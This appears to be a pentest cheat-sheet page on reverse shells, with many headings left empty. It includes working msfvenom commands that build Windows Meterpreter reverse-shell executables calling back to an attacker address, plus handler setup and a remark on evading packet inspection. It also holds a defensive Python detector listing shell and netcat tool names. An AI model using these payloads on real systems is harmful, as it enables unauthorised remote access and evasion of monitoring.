Shell
Reverse-shells
This is a great collection of different types of reverse shells and webshells. Many of the ones listed below come from these cheat sheets:
https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Msfvenom
There is an important difference between non-staged and staged payloads. A non-staged (stageless) shell is sent over in one block: the whole payload goes in a single stage. This can be caught with the Metasploit multi/handler, but also with netcat.
Staged shells are sent in pieces. This is useful when you only have a very small buffer for your shellcode and need to split the payload up: a small first stage is sent, sets up the connection, and then pulls in the rest. Meterpreter is a staged shell. This can be caught with the Metasploit multi/handler but not with netcat, which does not know how to deliver the second stage.
Windows
Meterpreter
Standard meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Meterpreter HTTPS
This makes the Meterpreter traffic look like ordinary HTTPS. Since it is wrapped in TLS the communication is encrypted, which can be used to get past deep-packet inspection.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
Non-staged payload
Staged payload
This must be caught with metasploit. It does not work with netcat.
Inject payload into binary
Linux
Binary
Bash
Php
Netcat
Bind shell
Reverse shell
With -e flag
Without -e flag
Ncat
Ncat is a better and more modern version of netcat. One feature it has that netcat lacks is encryption. If you are on a pentest job you might not want to communicate unencrypted.
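Ncat's encryption also means the wire gives a defender nothing to inspect, so the reliable place to spot any of the shells on this page is the host: whichever variant is used, there is a shell or netcat-like process wired to a socket instead of a terminal. The Python checker below is an added example, not part of the cheat sheet or of the ncat project. The process table it inspects is constructed (the Proc records mirror what readlink on /proc/<pid>/fd/<n> returns on Linux), and the rule labels and the snapshot_proc helper are my own names.

```python
"""Host-side reverse-shell indicator check (constructed example).

Each process is modelled as (pid, ppid, comm, fd -> target), where target is
what readlink(/proc/<pid>/fd/<n>) returns: "socket:[4242]", "pipe:[777]",
"/dev/pts/0", a file path.  snapshot_proc() collects real data on Linux; the
SAMPLE table is constructed so the rules can be exercised anywhere.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash", "busybox"}
NET_TOOLS = {"nc", "ncat", "netcat", "nc.openbsd", "nc.traditional", "socat"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")
PIPE_RE = re.compile(r"^pipe:\[\d+\]$")
TTY_PREFIXES = ("/dev/pts/", "/dev/tty")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    fds: Dict[int, str] = field(default_factory=dict)

    def stdio(self) -> List[str]:
        return [self.fds.get(n, "") for n in (0, 1, 2)]

    def has_socket(self) -> bool:
        return any(SOCKET_RE.match(t) for t in self.fds.values())


def classify(p: Proc, by_pid: Dict[int, Proc]) -> Optional[str]:
    """Return an indicator label for p, or None if nothing looks off."""
    stdio = p.stdio()
    if p.comm in SHELLS:
        # Rule A: the -e style and the stageless msfvenom shells leave the
        # shell's own stdin/stdout/stderr on the socket.
        if any(SOCKET_RE.match(t) for t in stdio):
            return "shell-stdio-on-socket"
        # Rule B: ncat --exec (incl. --ssl) keeps the socket itself and relays
        # to the child shell through pipes, so look at the parent instead.
        parent = by_pid.get(p.ppid)
        if parent and parent.comm in NET_TOOLS and parent.has_socket():
            return "shell-child-of-net-tool"
    if p.comm in NET_TOOLS and p.has_socket():
        # Rule C: the no -e FIFO pipeline: the net tool's stdin is a pipe from
        # the shell and its stdout is not a terminal.  Noisiest rule ("cat file
        # | nc host port" trips it too), so treat its hits as needing review.
        if PIPE_RE.match(stdio[0]) and not stdio[1].startswith(TTY_PREFIXES):
            return "net-tool-bridging-pipeline"
    return None


def scan(procs: List[Proc]) -> Dict[int, str]:
    """Map pid -> indicator label for every process that matches a rule."""
    by_pid = {p.pid: p for p in procs}
    return {p.pid: lbl for p in procs if (lbl := classify(p, by_pid))}


def snapshot_proc() -> List[Proc]:
    """Collect live data from /proc (Linux only); unreadable processes are skipped."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
            fds = {int(fd): os.readlink(f"/proc/{pid}/fd/{fd}")
                   for fd in os.listdir(f"/proc/{pid}/fd")}
        except OSError:
            continue
        procs.append(Proc(pid, ppid, comm, fds))
    return procs


# Constructed process table: one benign login shell, plus the three shapes
# the cheat sheet's netcat/ncat variants produce.
SAMPLE = [
    Proc(100, 1, "sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[100]"}),
    Proc(200, 100, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    Proc(300, 1, "sh", {0: "socket:[9001]", 1: "socket:[9001]", 2: "socket:[9001]"}),
    Proc(400, 1, "ncat", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null",
                          3: "socket:[9002]", 4: "pipe:[50]", 5: "pipe:[51]"}),
    Proc(401, 400, "sh", {0: "pipe:[50]", 1: "pipe:[51]", 2: "pipe:[51]"}),
    Proc(500, 1, "cat", {0: "/tmp/f", 1: "pipe:[60]", 2: "/dev/pts/1"}),
    Proc(501, 1, "sh", {0: "pipe:[60]", 1: "pipe:[61]", 2: "pipe:[61]"}),
    Proc(502, 1, "nc", {0: "pipe:[61]", 1: "/tmp/f", 2: "/dev/pts/1", 3: "socket:[9003]"}),
]

if __name__ == "__main__":
    for pid, label in sorted(scan(SAMPLE).items()):
        print(pid, label)
```

Rule A is the high-confidence one; rules B and C exist because an encrypting relay (ncat --ssl) or the FIFO trick moves the socket off the shell process, and a checker that only looks at the shell's own descriptors misses both.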
Bind
Telnet
Perl
Ruby
Java
Python
Web-shells - Platform Independent
PHP
This PHP shell is OS-independent. You can use it on both Linux and Windows.
ASP
WAR
JSP